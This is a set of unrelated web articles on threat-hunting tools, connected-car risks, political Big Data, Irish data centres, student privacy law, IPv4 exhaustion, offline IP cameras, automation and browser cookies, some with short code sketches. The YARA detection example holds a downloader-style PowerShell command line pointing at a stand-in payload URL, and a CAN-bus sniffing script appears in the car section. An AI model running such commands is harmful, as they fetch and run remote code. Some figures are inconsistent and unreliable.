ZERO-DAY VULNERABILITIES: A zero-day vulnerability is one that nobody is aware of until the breach happens (hence the name zero-day, as no time elapses between the attack happening and the vulnerability being made public). If a developer has not released a patch for the zero-day vulnerability before a hacker exploits it, the resulting attack is known as a zero-day attack. Having the red team write proof-of-concept (POC) exploits is one way to mitigate zero-day vulnerabilities.

Analyzing Data for Threat Hunting

Data on its own does not equate to intelligence, so it would be overkill to simply record every log or event that makes noise on your network. Ask instead: what are the systems, data, or intellectual property that would cripple the company if compromised? Several types of logs might be appropriate to gather, depending on your scenario.

Essential Types of Cyber Threat Hunting Tools

Analytics-driven: Threat hunting tools powered by analytics use behavior analytics and machine learning to produce key metrics and hunting leads. Examples of analytics tools include Maltego CE, Cuckoo Sandbox, and Automater.

Maltego CE is a data-mining tool. It builds interactive relationship graphs for link analysis and is also used for online investigations. It works by identifying relationships between pieces of data from various sources on the internet, and you will be notified if these add up to a threat.

Cuckoo Sandbox is an open-source malware analysis system that lets you detonate suspicious files in isolation while collecting detailed, up-to-the-minute results. Cuckoo Sandbox can give you information and analytics about how malicious files work so that you can better understand how to defend against them.

Automater focuses on intrusion data. You select a target, and Automater checks the findings from common sources.

Intelligence-driven: Intelligence-driven threat hunting collects all the information and reporting you already have on hand and applies it to the hunt. Examples of cyber threat intelligence platforms include YARA, CrowdFMS, and BotScout.

YARA classifies malware by building rule definitions based on binary and textual patterns. Those rules are then used to identify matching malware and put a stop to it.

CrowdFMS is an automated framework that gathers and processes samples from a website that publishes phishing email information. An alert is triggered if anything matching a known phishing email crosses your network.

BotScout prevents bots from registering on forums, where they contribute to spam, server abuse, and database contamination. It monitors IPs as well as names and email addresses in order to identify the source of bot activity and remove it.

Driven by situational awareness: Risk analyses are used to study an organization's or individual's patterns. The AI Engine and YETI are examples of situational-awareness-driven tools.

The AI Engine is an interactive tool that helps modernize your network's intrusion detection system. It can learn without manual interaction, and it supports network forensics, network selection, and span detection.

YETI is a tool for sharing threat knowledge across organizations. Businesses can share the data they choose with trusted partners to help keep everyone updated on the latest threat patterns.
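To make the YARA approach above more concrete, here is a small hedged sketch using the `yara-python` bindings (assumed to be installed; the rule itself is a toy example for illustration, not a real detection signature). A YARA rule combines textual or binary patterns with a condition, and the compiled rules can then be matched against files or memory buffers.

```python
import yara  # pip install yara-python (assumed available)

# Toy rule: flag content that contains both strings. Real rules are far richer.
RULE_SOURCE = r'''
rule demo_suspicious_downloader
{
    strings:
        $a = "powershell -enc" nocase
        $b = "http://" ascii
    condition:
        $a and $b
}
'''

rules = yara.compile(source=RULE_SOURCE)

# Match against an in-memory buffer; rules.match(filepath=...) works for files too.
sample = b"cmd.exe /c powershell -enc SQBFAFgA ... http://example.test/payload"
for match in rules.match(data=sample):
    print("rule hit:", match.rule)
```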
Paid tools also exist; Sqrrl, Vectra, and InfoCyte are among the more common commercial threat hunting tools. Hunting also plays a significant role in the "incident scoping" phase of incident response, where incident intelligence guides the hunters toward additional compromised hosts. This process helps assess the total number of systems affected and gauge the severity of the breach. Hunters look for suspicious actions that may suggest the presence of malicious activity. Effective cyber threat hunters look for signs of ongoing attacks in the system, then take those clues and hypothesize how the attacker could have carried out the attack.
<urn:uuid:852a2d44-9528-47c3-8a5d-0460a6868e32>
CC-MAIN-2022-40
https://gbhackers.com/catch-the-unknown-cyber-attacks-with-threat-hunting/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00469.warc.gz
en
0.915842
1,527
2.90625
3
Modern cars use a lot of technology and are almost always connected to the internet, which makes them vulnerable and comparatively easy to compromise through malware attacks and other security flaws present in the IoT devices connected to them. Connected cars are rapidly increasing in number, and multiple IoT devices in each car need to communicate remotely to provide features such as Wi-Fi and driver assistance. The automotive security field therefore deals with many security risks: modern cars expose many vulnerabilities and face the same high security risks as other connected devices.

Major Modern Car Security Risks

Vehicle-to-Vehicle Communications: V2V communication is established over a wireless network that lets two vehicles talk to each other on the road, for example to reduce a car's speed if another vehicle comes too close. An attacker could abuse a flaw in this wireless communication technology to manipulate the car's speed, and if the V2V system becomes an infection vector, a malicious actor could create malware that spreads to many connected cars.

Controller Area Network Backdoor: Many cars use a controller area network (CAN) bus to communicate with the vehicle's electronic control units (ECUs), which operate subsystems such as antilock brakes, airbags, transmission, audio system, doors, and many other parts—including the engine. Modern cars also include an OBD-II (on-board diagnostics, version 2) port used by mechanics to diagnose problems, and CAN traffic can be intercepted from this OBD port. An external OBD device could therefore be plugged into a car as a backdoor for external commands, controlling services such as the Wi-Fi connection or unlocking the doors.

Malware and Exploits: Modern car technology allows us to connect our smartphones to our cars, adding functions such as phone calls, SMS, music, and audiobooks. Powerful recent malware and exploits could compromise the phone or the firmware, which in turn could compromise the car's devices.

Car Theft and Key Fob Hacking: Key fob hacking is a technique that enables an attacker to enter the car without breaking in. It is commonly used by thieves and can be carried out with cheap equipment. The attacker blocks the signal from the wireless key while the owner tries to lock the car, or replays the captured signal to compromise the car. According to McAfee research, one variant of the attack uses a jammer to block the signal: the jammer interferes with the electromagnetic waves used to communicate with the vehicle, preventing the car from locking and leaving access free to the attacker.

Personal Data and Tracking: Connected cars keep recording sensitive personal data about drivers from external devices such as phones, which can include contact details, SMS and call history, and even the musical tastes of whoever connects to the car. These data can be used by companies, cybercriminals, and governments for various purposes, such as spying on and tracking people, marketing, or insurance contracts.

Fake Car Data: Vehicle data can also be adjusted and faked. By manipulating information such as emissions tests or performance figures, companies can inflate results to increase sales. Likewise, drivers could alter car statistics such as the distance traveled to trick insurance companies or future buyers.
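To make the CAN/OBD discussion above more tangible, here is a hedged sketch of what passively observing CAN traffic through a plugged-in interface can look like, using the third-party `python-can` library. The channel name, interface type, and the idea of connecting via an OBD-II adapter are assumptions for illustration, not a statement about any specific vehicle or adapter.

```python
import can  # pip install python-can (assumed available)

# Assumes a SocketCAN-compatible adapter exposed as "can0" (e.g. via an OBD-II dongle on Linux).
bus = can.interface.Bus(channel="can0", bustype="socketcan")

print("Listening for CAN frames (Ctrl+C to stop)...")
try:
    while True:
        msg = bus.recv(timeout=1.0)          # blocks up to 1 s for the next frame
        if msg is None:
            continue                          # no traffic in this interval
        print(f"id=0x{msg.arbitration_id:03X} data={msg.data.hex()}")
except KeyboardInterrupt:
    pass
finally:
    bus.shutdown()
```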
<urn:uuid:a2fde0c1-ffec-4562-bc59-19c56bdd0e2d>
CC-MAIN-2022-40
https://gbhackers.com/modern-cars-vulnerability/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00469.warc.gz
en
0.937421
675
2.625
3
In the coming months and over the next year, several important votes and elections will take place around the world: the presidential elections in the United States this November; the French presidential election in April/May 2017, the French legislative election next June; the German federal election next August, etc. Most of these already have campaigns underway to help sway the opinions and decisions of voting parties, which raises the question—how will the candidates of each party utilise Big Data to help give them a competitive edge? Forming an opinion based on facts Ever since the re-election of Barack Obama in 2012, it’s been clear that Big Data has become one of the major weapons in the arsenal of political marketing. Campaign managers have already demonstrated how to wield big data for voter micro-targeting, drastically improving the efficiency of fund-raising, anticipating voter demands and refining their messaging to address those needs, predictive analysis to anticipate how their candidate will perform in the near and long-term, use of social media to extract voter sentiment, etc. Data Scientists have made traditional political campaigns a thing of the past. Candidates have even gone as far as designing apps that test voters’ knowledge of pressing issues facing the country and future challenges to get them more engaged in the dialogue. At the same time, candidates’ campaigns and political debates are sparking plenty of chatter across all social networks, through which voters can engage in peer-to-peer discussions, which can also help shape their decision on which candidate for which to vote. Choosing the right leader can be a long and difficult process that often requires extensive research and filtering of information from several data sources to verify which candidate actually has the right credentials to lead the country in the right direction. Using Big Data Tools to Revolutionise Citizen Involvement The Obama administration introduced the notion of increased government transparency by opening up access to a vast amount of information in order to shed light on the government's actions. Not only are citizens now able to view information on current and upcoming federal budgets and compare them with previous budgets, but the site goes as far as listing all White House employees’ salaries; information on party donors and more. Besides the goal of having more government transparency—hopefully thereby obtaining greater citizen trust—the premise was to also encourage more citizen involvement with government. As a result of the very social and open Barrack Obama voting experience in the US, similar tactics are now being employed in France. In anticipation of the Fall right-wing primaries in France (and the left-wing primaries in January 2017), all of the parties and candidates are employing strategies to analyse voter sentiment to inspire marketing, where "the voter is a consumer, and the candidate, is the product." Moving Beyond Communications But even beyond communications with the citizens, data scientists at the White House have laid the groundwork for a new way of finding never before seen answers to social and economic problems - based on the analysis of varied data sets. From transportation and infrastructure to the fight against crime or fraud, the positive results achieved thanks to digital tools are helping political leaders eradicate various societal challenges. 
Additionally, at a time when polling institutes' projections are increasingly questioned (as was the case with the recent British vote on Brexit), Big Data can provide a more precise and comprehensive view of likely outcomes without representative samples. A project done by Wei Wang of the Columbia University statistics department and Sharad Goel and David Rothschild of Microsoft Research, showed that Big Data tools hold promise not only for election forecasting, but also for measuring public opinion on a broad range of social, economic and cultural issues. As a growing number of voters are calling for increased government transparency and a new approach to politics, Big Data can help provide more direct access to citizen sentiment so that government officials can be more in tune with citizens' demands. Isabelle Nuage, Director of Product Marketing for Big Data at Talend (opens in new tab) Image source: Shutterstock/Carlos Amarillo
<urn:uuid:a89eb80b-4a77-40a8-a814-40ee5125733e>
CC-MAIN-2022-40
https://www.itproportal.com/features/big-data-is-revolutionising-political-campaigning/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00469.warc.gz
en
0.947709
810
2.859375
3
In this edition of Voices of the Industry, Garry Connolly, founder of Host in Ireland, explains how and why digital infrastructure coming from Ireland plays a unique role around the world. We are in the midst of the Fourth Industrial Revolution. Data is the engine of this revolution, much like steam was to the first Industrial Revolution nearly 300 years ago. Data and digital tools are enabling new types of innovation, communication and creativity. In fact, every person in the world generated 1.7 megabytes of data per second in 2020. Much still seems to be misunderstood, however, about the “centres” where that “data” is housed. To the general public, data centres are sometimes thought of as secretive and austere grey “boxes” that are disconnected from their local communities. There is a misperception they add little value to the communities they reside in despite the economic benefits they provide. The reality is data centres do not run in isolation from society, they are there because of it. From Floppy to Fibre Ireland has had a six decade relationship with “data” and a decade plus relationship with the “centres.” From mainframes in the 1960s to leading the world in software exports via floppy disk in the 1990s to data exports via data centres and fibre today. Irish companies have a long history supporting and partnering with global multinational organisations. Through this experience, the knowledge acquired by Irish companies has helped Ireland evolve as a leading data hosting nation, as well as a supplier of skills and services needed for data’s global expansion. IBEC’s Cloud Infrastructure Ireland group also estimates the technology sector, which is underpinned by the data centre industry, contributes €52 billion ($52 million) to the economy and employs approximately 150,000 people. That translates to a real economic benefit for the Irish economy. According to Enterprise Ireland, €2 billion ($2 billion) of global Irish sales exports can be attributed to data centres. What has made Ireland an intrinsic home to digital infrastructure and Irish companies so successful? There are common threads that run throughout companies who work from and within Ireland no matter how big or small they are – Ingenuity, Relentlessness, Integrity, Strength and History – I.R.I.S.H. But being I.R.I.S.H. is not about nationalities, but rather how and why digital infrastructure coming from Ireland – with global and Irish companies – plays a unique role around the world. An ecosystem at its most basic biological definition consists of organisms and the physical environment with which they interact. A business ecosystem is typically defined as a network of organisations involved in the creation and delivery of products and services. For an ecosystem to flourish, cooperation and competition – or “co-opetition” – needs to exist. A diverse group of partners all interact and collaborate to bring the most innovative ideas and products to the forefront and raise the playing field for the industry as a whole. Although many of our Host in Ireland partners are competitors, they have historically come together as a collective to promote the capabilities of Ireland as a centre of data excellence. Today, many of our partners are location agnostic and building robust businesses from Ireland across Europe, the Middle East, and making inroads to Africa and the rest of the world. 
Given the fact the data centre market opportunity in Europe is expected to grow to $66B by 2030, and the domestic Irish market represents 10% of that opportunity, the focus is now just as heavily focused on promoting Irish companies in the global data centre market. What Comes Next The chief economists in the United Nations jointly identified climate change and technological revolution as two of the five “megatrends” that will shape our world over the course of this century. The socioeconomic challenges of the last few years have become a springboard for digitalisation and changed our expectations of how we interact with technology. Running in parallel, the decarbonisation of our societies, including the electrical grid, is an increasingly urgent issue. The place where digitalisation and decarbonisation intersect is none other than the data centre. There’s no doubt as the datasphere continues to grow, Tier 1 hosting locations, including Ireland, are facing tough challenges ahead. Power availability and sustainability are at the heart of every discussion. Yet, as Albert Einstein once said, ““In the midst of every crisis, lies great opportunity.” Despite short term discomfort, in the long run there is a tremendous opportunity to innovate and change the way we do things. Scrutiny on sustainability will drive a meticulous approach to creating sustainable solutions on everything from equipment manufacturing to construction to operations. The positive economic impact to global and individual economies can not be underestimated as it is likely to continue for the foreseeable future. Digitalisation is here to stay and decarbonisation is a must for the future of our planet. It’s time once again for the data centre industry to be brave, creative and relentless to meet the challenges and seize opportunities ahead of it. Garry Connolly is founder of Host in Ireland, a global initiative created to increase awareness for how and why digital infrastructure coming from Ireland – with global and Irish companies – plays a unique role around the world. Learn more in the Irish Data Centre Ecosystem Report.
<urn:uuid:19bfdce9-28cf-436f-8e4e-f37c370600cb>
CC-MAIN-2022-40
https://datacenterfrontier.com/the-unique-role-of-digital-infrastructure-coming-from-ireland/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00469.warc.gz
en
0.944768
1,104
2.78125
3
The Center for Democracy & Technology, along with the law firm BakerHostetler, developed a state-by-state compendium of privacy laws relating to the collection, use, and sharing of student data. While the practice of collecting data about students is not new–schools have been gathering and reporting test scores, grades, retention records, and the like for years–the means by which student data is collected, the types of data collected, and the entities that ultimately have access to this data have expanded dramatically, the report explains. In order to understand the laws on a state level, as well as in a regional and national context, let's look at each state and region individually, using the United States Census Bureau's four statistical regions–the Northeast, Midwest, South, and West.

South: Alabama, Arkansas, Delaware, Florida, Georgia, Kentucky, Louisiana, Maryland, Mississippi, North Carolina, Oklahoma, South Carolina, Tennessee, Texas, Virginia, Washington, D.C., West Virginia

West: Alaska, Arizona, California, Colorado, Hawaii, Idaho, Montana, Nevada, New Mexico, Oregon, Utah, Washington, Wyoming

Midwest: Illinois, Indiana, Iowa, Kansas, Michigan, Minnesota, Missouri, Nebraska, North Dakota, Ohio, South Dakota, Wisconsin

Northeast: Connecticut, Maine, Massachusetts, New Hampshire, New Jersey, New York, Pennsylvania, Rhode Island, Vermont
<urn:uuid:ebcfa76f-e67b-48ee-8ff0-6d7089741453>
CC-MAIN-2022-40
https://origin.meritalk.com/articles/state-laws-govern-student-data-privacy/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00469.warc.gz
en
0.869534
285
2.96875
3
Like the monotonous droning of jungle drums, the predictions about the exhaustion of the world's supply of public IPv4 addresses have been repetitive and continual. We have been hearing about the impending scarcity of IPv4 addresses for so long that we no longer hear the calls to action. Today's announcement by the American Registry for Internet Numbers (ARIN) that it has reached IPv4 exhaustion has now sounded the alarm. Organizations can no longer ignore what the future of the IPv4 Internet may be like; instead, they must seize ownership of their own destiny and deploy IPv6.

When the Internet Protocol (IP) was being developed in the 1970s, the number of endpoints was quite small. The work being done at the Defense Advanced Research Projects Agency (DARPA) involved a small set of university research and government systems. The 32-bit addresses used with IPv4 are hierarchically allocated (like phone numbers) and use quad dotted-decimal notation for human readability. At the time the Internet Protocol was developed, no one could have possibly predicted the coming popularity of the Internet. Addressing and routing go hand in hand, and the inefficient allocation of IPv4 addresses eventually led to a worldwide shortage of addresses. The IETF Address Lifetime Expectations (ALE) Working Group anticipated this trend back in the mid-1990s and predicted that this day would come. With the introduction of Classless Interdomain Routing (CIDR) and Network Address Translation (NAT) in the mid-1990s, IPv4 has been on extended life support for almost two decades. For almost a decade the community has been watching Geoff Huston's IPv4 Address Report as a guide to anticipate when IPv4 exhaustion would occur.

IANA and the RIRs

The Internet Assigned Numbers Authority (IANA) depleted its free pool of IPv4 address space on February 3, 2011. On that date, all the available IPv4 addresses had been allocated to the five Regional Internet Registries (RIRs) around the world. Each RIR has had to independently manage its own supply of IPv4 address resources. However, each RIR has had a different strategy for its exhaustion stages and phases, and a different policy for how it manages the allocation of its limited IPv4 resources.

The Asia-Pacific Network Information Centre (APNIC) has had an extremely fast-growing Internet population and took a particularly aggressive stance on IPv4 address allocation and on prioritizing IPv6 deployment. Its supply of IPv4 addresses ran out on April 15, 2011. APNIC has been giving guidance to its member organizations for years on IPv4 address exhaustion and has a page on what is happening in the post-exhaustion phase.

The next RIR to run out of IPv4 addresses was the Réseaux IP Européens Network Coordination Centre (RIPE NCC). Its supply of public IPv4 addresses passed its final /8 equivalent on September 14, 2012. RIPE NCC's policies state that its members can make a one-time request for a /22 allocation and that no new Provider Independent (PI) allocations will be made.

The Latin America and Caribbean Network Information Centre (LACNIC) was the next RIR to exhaust its supply of IPv4 addresses. This occurred on June 10, 2014, as a result of its growing Internet community. Its member organizations continue to grow their Internet access, and LACNIC has initiatives around helping its members embark on the IPv6 path.
The American Registry for Internet Numbers (ARIN) is the Regional Internet Registry (RIR) for the U.S., Canada, and Caribbean and North Atlantic islands. North America has had a large Internet-connected population, but as more systems and organizations have connected to the Internet, ARIN has processed numerous requests for public IPv4 addresses. ARIN entered Phase 4 of their IPv4 Exhaustion plan on April 23, 2014 and has been operating under their Phase 4 policies since then. During Phase 4, any new request for IPv4 address space is reviewed by the IPv4 Review Team queue where they are reviewed in a first-come first-served basis. ARIN has been managing the IPv4 Request Pipeline as their IPv4 stockpile dwindles. The current IPv4 address inventory is listed on ARIN’s IPv4 depletion page. ARIN has an IPv4 Depletion blog where you can find the latest information on this topic. Now that IPv4 exhaustion has occurred for ARIN members, the rules for future IPv4 allocations will change. ARIN members can make address requests, but ARIN is likely to not have address supply to meet those requests. Applicants will either be given the choice to accept a smaller block than they requested or get their name added to a waiting list. Applicants can also withdraw their request and chose to acquire their IPv4 addresses from another source. This ARIN web page provides information on the waiting list for unmet IPv4 address requests. These guidelines are published in the Number Resource Policy Manual (NRPM) Section 4.1.8. The African Network Information Centre (AfriNIC) has a growing Internet population too, but they have not reached exhaustion of their IPv4 address supply. As more of their communities come online their usage of their remaining IPv4 addresses are likely to accelerate. Using both IPv4 and IPv6 in parallel dual-protocol mode gives your organization the best position to be able to communicate with the broadest Internet community. Deploying IPv6 is a long-term strategy, but enterprise organizations must start that process immediately. However, even if organizations aggressively deploy IPv6, they will still experience a short-term IPv4 address shortage. Still, organizations may be forced to purchase/lease public IPv4 addresses and now those IPv4 addresses will only become more expensive. If you haven’t embarked on the IPv6 path yet, there is no time like the present to define your organization’s IPv6 strategy. Ed Horley, Practice Manager – Cloud Solutions and the Practice Lead – IPv6 at Groupware Technology, and Infoblox IPv6 Center of Excellence member has a great blog with some solid guidance for enterprises on how to get started with IPv6. Following are his first phases of an IPv6 plan. - Kick off 2015 with the first phase of your IPv6 plan: Assessment - The second phase of your IPv6 adoption plan: Training - The Third Phase of Your IPv6 Adoption Plan: Planning and Design - The fourth phase of your IPv6 adoption plan: Proof of Concept
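Finally, as a small illustration of the dual-protocol (dual-stack) operation discussed earlier, the sketch below uses only Python's standard library (the hostname is a placeholder) to ask the resolver for both the IPv4 and IPv6 addresses of a name — essentially what a dual-stack client does before choosing which protocol to connect over.

```python
import socket

def list_addresses(hostname: str, port: int = 443):
    """Return the IPv4 and IPv6 addresses the resolver offers for a host."""
    v4, v6 = set(), set()
    for family, _type, _proto, _canon, sockaddr in socket.getaddrinfo(
        hostname, port, socket.AF_UNSPEC, socket.SOCK_STREAM
    ):
        if family == socket.AF_INET:
            v4.add(sockaddr[0])
        elif family == socket.AF_INET6:
            v6.add(sockaddr[0])
    return sorted(v4), sorted(v6)

ipv4, ipv6 = list_addresses("www.example.com")
print("A records    :", ipv4 or "none found")
print("AAAA records :", ipv6 or "none found")
```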
<urn:uuid:815c9dd8-d1a0-4472-9747-f0637a88c21d>
CC-MAIN-2022-40
https://blogs.infoblox.com/ipv6-coe/north-americas-ipv4-address-shortage/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00669.warc.gz
en
0.952137
1,390
2.59375
3
One common misconception is that IP cameras can only work if they’re connected to the internet. It’s a valid assumption to make since after all, IP does stand for internet protocol. However, IP cameras can still work without internet connection. Let’s go over how you can install an IP system without internet and their limitations. Setting Up IP Cameras Without Internet As stated in our basic IP CCTV systems guide, IP systems rely on a connected network to do all of their data transmission. However, this connected network doesn’t necessarily need to be the internet. If you look on your router, you will see something called LAN and WAN. LAN stands for local area network whereas WAN stands for wide area network. The difference between these 2 networks is that LAN is confined to a smaller area, like a building or home, while WAN is everything outside of this area- so basically the entire internet. An IP system setup without internet connection will pretty much look like a regular IP system with internet. You would still be able to install an IP system using PoE and have the option of using or not using an NVR. The only difference is that all of your devices will be connected through the LAN but not the WAN. However, remember that if you want to use IP cameras, you will still need a router that is capable of providing a LAN for your devices to connect to. Keep in mind that using IP cameras without internet connection will mean that you will lose the benefit of remote viewing. While the IP system will be connected to each other through the LAN, they will not be connected to the WAN so there will be no way to access the cameras through the internet. However, you will still be able to store and view your footage on-site through the LAN.
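For readers who want to see what "viewing footage through the LAN" can look like in practice, here is a hedged sketch using OpenCV to pull a frame from a camera's RTSP stream over the local network. The IP address, credentials, and stream path are placeholders — the exact RTSP URL format varies by camera vendor, so check your camera's documentation.

```python
import cv2  # pip install opencv-python (assumed available)

# Placeholder LAN address and stream path; real values depend on your camera.
RTSP_URL = "rtsp://admin:password@192.168.1.108:554/stream1"

cap = cv2.VideoCapture(RTSP_URL)
if not cap.isOpened():
    raise SystemExit("Could not open the RTSP stream - check the URL and LAN connectivity.")

ok, frame = cap.read()                    # grab a single frame from the stream
if ok:
    cv2.imwrite("snapshot.jpg", frame)    # save it locally, no internet required
    print("Saved snapshot.jpg", frame.shape)
cap.release()
```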
<urn:uuid:865a5d38-e0e9-4704-82c5-5c8238873030>
CC-MAIN-2022-40
https://www.2mcctv.com/can-ip-cameras-work-without-internet/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00669.warc.gz
en
0.941732
372
2.5625
3
A loopback interface is a logical virtual interface created on a router simulating a real interface. This can be used to connect to management services such as Web (HTTPS), SNMP, ACS (TR069), Syslog or SSH as well as authentication services such as TACACS+ or RADIUS instead of using a LAN IP. For authentication function, using the dedicated loopback address will reduce the administrative overhead since there is no need to add multiple router IP addresses into the AAA server. In addition security will be enhanced by isolating authentication from the user network. Using a loopback address means the virtual interface is always up, especially when the CPE has multiple WAN interfaces. For example, if BGP connected on WAN1 is down, management and AAA traffic can be routed to the defined loopback interface through the VPN tunnel connected on WAN2. Another benefit is that the loopback IP can be an IP address (with a 32-bit mask). This means that the interface is not assigned to any LAN port, which improves security and saves a lot of IP address space. We can imagine that if we assign 24-bit mask IPs to many managed routers, there will be insufficient network IPs. 1. specify a LAN interface and give it an IP addr. with 32-bit mask. 2. Go to Management setup page and tick Enable Loopback Interface. Was this helpful? Sorry about that. Contact Support if you need further assistance, or leave us some comments below to help us improve.
<urn:uuid:ac1d5c41-57f9-453d-bc34-16e39eb16fcb>
CC-MAIN-2022-40
https://www.draytek.com/support/knowledge-base/10914
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00669.warc.gz
en
0.914881
328
2.765625
3
Throughout the Industrial Revolution, laborers with a wide range of manual skills helped give rise to many of the innovations and technologies that were used in workplaces throughout the 20th-century. Some, such as Henry Ford’s assembly line introduced in 1913, for example, are still used today. Yet, as we look to the future, we can already see signs of how the introduction of artificial intelligence (AI) and other intelligent machines might cause additional shifts in labor through the process of automation. Several decades ago, when the internet was still a fledgling technology, the notion of robots and intelligent machines working alongside humans was still confined within the realm of science-fiction. Today, that notion has become scientific fact. Furthermore, most researchers and analysts agree that as intelligent machines and automation technologies continue advancing, almost every global industry — and the human laborers who comprise them — will be affected. To know the future, look to the present If we wish to understand how the future of automation and intelligent machines (i.e., robots) will impact labor markets, we need only look at how it is doing so presently. Robots are already being employed in ways that, up until just a few short years ago, many of us would have never thought possible. For instance, many companies and organizations within the healthcare industry have transitioned a bulk of their administrative and patient profiling tasks from human employees to automated, intelligent systems fueled by AI and machine learning (ML) technology. In other labor sectors that have traditionally relied on the physical skills of manual workers, robots and machines have steadily been replacing human labor for decades, and automation in these spaces is now rapidly compounding. According to the International Federation of Robotics, US manufacturing firms introduced an average of one robot worker per 1,000 human workers between 1997 and 2003. By comparison, European firms introduced roughly 1.6 robots per 1,000 human workers during that same period. More recently, however, in the industrial manufacturing sector alone, robot density per employee doubled globally between 2015 and 2021 from approximately 66 per 10,000 human workers to 126. This tells us that the hypothesized “Automation Revolution” may occur much sooner than we think; possibly in as little as 15 years. As such, human employees may soon find themselves needing to possess different skill sets in order to remain competitive and relevant in labor markets dominated by automated, intelligent machines. Shifts in labor will cause shifts in labor skills As automation continues to compound over the coming years, replacing a growing number of jobs once held by skilled manual laborers, human workers will be forced to either expand their existing skill sets or become capable at new ones. According to one report from McKinsey, “The need for some skills, such as technological as well as social and emotional skills, will rise, even as the demand for others, including physical and manual skills, will fall.” Subsequently, this will place pressure on businesses and companies to reconsider the ways in which work and labor is structured and conducted within their organizations. Coinciding with McKinsey’s report is another from MIT, which revealed that automation and robots may replace a further 2 million physical human laborers in manufacturing by 2025. However, this poses an issue in regard to social inequality. 
As Karishma Ramkarran, staff reporter for Scientific Survey says, “…those who are most affected tend to be low-income and people of color. Minimum wage workers often have little to no social mobility or financial security that would enable them to pursue a career towards a more “skilled” profession that requires a certain degree of education or training.” These reports show us that the compounding rate of automation in manufacturing is directly correlated with the income inequality of manual workers. Many of these laborers do not have the ability to access education that could help them learn or train social and emotional skills, leaving them without many other options for employment. As a result, in the next 15 years, there will likely be increased pressure placed on social, labor, and political leaders to help retrain millions of human workers to re-enter a workforce saturated with automation and intelligent machines. Both the speed and extent to which automation is occurring in the labor market, while daunting for some, is not unprecedented. Yet as automation and intelligent machines continue being integrated into an increasing number of labor market sectors, many people (particularly the workers whose jobs are replaced by these technologies) will look to political leaders and legislators who hold the influence to shape future labor market policies. Despite the influence those policy-makers may have, this new paradigm shift isn’t arising — nor will it continue to — within a vacuum. Both politically and culturally, people will have to accept intelligent machines and adapt accordingly just as they have done with other technological innovations in the past, as we witnessed, for example, with the advent of smartphones. Technology has historically outpaced legislation and will continue doing so throughout the emerging Automation Revolution. While public policy will ultimately hold some degree of influence over the extent of automation’s impact on labor markets, it will only come after private institutions, organizations, and our societies learn how to evolve with increased automation in labor and adapt to it.
<urn:uuid:ade524ba-18a4-4766-9c72-337e7a1af40d>
CC-MAIN-2022-40
https://digitalcxo.com/article/the-automation-revolution-and-the-shift-in-labor/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00669.warc.gz
en
0.959864
1,062
3.28125
3
As an avid internet surfer, you’ve most likely heard of cookies. No, we’re not talking about the ones filled with chocolate chips. We’re talking about the ones that allow you to log in to your favorite websites. Cookies may impact your online security, so check out these tips to manage them and keep your online accounts safe. What Are Cookies in Browsers? Ever wonder how a website saves the items you placed in your shopping cart last week, even though you closed the tab before making the purchase? This is made possible by cookies. According to the Federal Trade Commission, a cookie is information saved by your web browser. When you visit a website, the site may place a cookie on your web browser so it can recognize your device in the future. If you return to that site later, it can read that cookie to remember you from your last visit, keeping track of your activities over time.1 First-party vs. Third-party Cookies Cookies come in either the first-party or third-party variety. There’s no difference between the two in how they function, but rather in where and how you encountered them. First-party cookies belong to sites you visited first-hand in your browser. Third-party cookies, or “tracking cookies,” generally come from third-party advertising websites. Magic Cookies vs. HTTP Cookies Although cookies generally function the same, there are technically two different types of cookies. Magic cookies refer to packets of information that are sent and received without changes. Historically, this would be used to log in to a computer database system, such as an internal business network. This concept predates the modern cookie we use today. HTTP cookies are a repurposed version of the magic cookie built for internet browsing and managing online experiences. HTTP cookies help web developers give you more personalized, convenient website experiences. They allow sites to remember you, your website logins, and shopping carts so you can pick back up where you left off from your last visit. However, cybercriminals can manipulate HTTP cookies to spy on your online activity and steal your personal information. What Is Cookie Hijacking? Cookie hijacking (also known as session hijacking) is typically initiated when a cybercriminal sends you a fake login page. If you click the fake link, the thief can steal the cookie and capture anything you type while on the fraudulent website. Like a phishing attack, cookie hijacking allows a cybercriminal to steal personal information like usernames, passwords, and other important data held within the cookie. If you enter your information while on the fake website, the criminal can then put that cookie in their browser and impersonate you online. They may even change your credentials, locking you out of your account. Sometimes, criminals initiate cookie hijacking attacks without a fake link. If you’re browsing on an unsecured, public Wi-Fi connection, hackers can easily steal your data that’s traveling through the connection. This can happen even if the site is secure and your username and password are encrypted. Can Cookies Compromise Your Browser Security? Tips for a More Secure Browsing Experience Preventing cookie hijacking attacks can allow you to browse the internet with greater peace of mind. Follow these tips to not only safeguard your personal information but to also enhance your browsing experience: Clean out the cookie jar Make it a habit to clear your cookie cache regularly to prevent cookie overload, which could slow your search speeds. 
